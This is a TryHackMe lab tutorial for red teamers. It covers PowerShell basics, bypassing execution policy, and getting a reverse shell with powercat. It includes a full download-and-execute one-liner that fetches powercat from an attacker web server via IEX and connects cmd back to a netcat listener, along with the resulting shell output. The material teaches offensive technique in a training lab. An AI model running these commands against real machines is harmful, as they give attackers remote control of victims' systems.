PowerShell (PSH)
PowerShell is an object-oriented programming language executed from the Dynamic Language Runtime (DLR) inย .NETย with some exceptions for legacy uses. Check out the TryHackMe room, Hacking with PowerShell for more information about PowerShell.
Red teamers rely on PowerShell in performing various activities, including initial access, system enumerations, and many others.ย Letโs start by creating a straightforward PowerShell script that prints โWelcome to the Weaponization Room!โ as follows,
Write-Output "Welcome to the Weaponization Room!"Save the file asย thm.ps1.ย With theย Write-Output, we print the message โWelcome to the Weaponization Room!โ to the command prompt.ย Now letโs run it and see the result.
C:\Users\thm\Desktop>powershell -File thm.ps1
File C:\Users\thm\Desktop\thm.ps1 cannot be loaded because running scripts is disabled on this system. For more
information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
+ CategoryInfo : SecurityError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : UnauthorizedAccess
C:\Users\thm\Desktop>Execution Policy
PowerShellโs execution policy is aย security option to protect the system from running malicious scripts. By default, Microsoft disables executing PowerShell scripts .ps1 for security purposes. The PowerShell execution policy is set to Restricted, which means it permits individual commands but not run any scripts.
You can determine the current PowerShell setting of your Windows as follows,
PS C:\Users\thm> Get-ExecutionPolicy
RestrictedWe can also easily change the PowerShell execution policy by running:
PS C:\Users\thm\Desktop> Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic at
http://go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "N"): ABypass Execution Policy
Microsoft provides ways to disable this restriction. One of these ways is by giving an argument option to the PowerShell command to change it to your desired setting. For example, we can change it to bypass policy which means nothing is blocked or restricted. This is useful since that lets us run our own PowerShell scripts.
In order to make sure our PowerShell file gets executed, we need to provide the bypass option in the arguments as follows,
C:\Users\thm\Desktop>powershell -ex bypass -File thm.ps1
Welcome to Weaponization Room!Now, letโs try to get a reverse shell using one of the tools written in PowerShell, which is powercat. On your AttackBox, download it from GitHub and run a webserver to deliver the payload.
user@machine$ git clone https://github.com/besimorhino/powercat.git
Cloning into 'powercat'...
remote: Enumerating objects: 239, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 239 (delta 0), reused 2 (delta 0), pack-reused 235
Receiving objects: 100% (239/239), 61.75 KiB | 424.00 KiB/s, done.
Resolving deltas: 100% (72/72), done.Now, we need to set up a web server on that AttackBox to serve the powercat.ps1 that will be downloaded and executed on the target machine. Next, change the directory to powercat and start listening on a port of your choice. In our case, we will be using portย 8080.
user@machine$ cd powercat
user@machine$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...On the AttackBox, we need to listen on port 1337 using nc to receive the connection back from the victim.
user@machine$ nc -lvp 1337Now, from the victim machine, we download the payload and execute it using PowerShell payload as follows,
C:\Users\thm\Desktop> powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://ATTACKBOX_IP:8080/powercat.ps1');powercat -c ATTACKBOX_IP -p 1337 -e cmd"Now that we have executed the command above, the victim machine downloads theย powercat.ps1ย ย payload from our web server (on the AttackBox) and then executes it locally on the target using cmd.exeย and sends a connection back to the AttackBox that is listening on portย 1337. After a couple of seconds, we should receive the connection call back:
user@machine$ nc -lvp 1337 listening on [any] 1337 ...
10.10.12.53: inverse host lookup failed: Unknown host
connect to [10.8.232.37] from (UNKNOWN) [10.10.12.53] 49804
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\thm>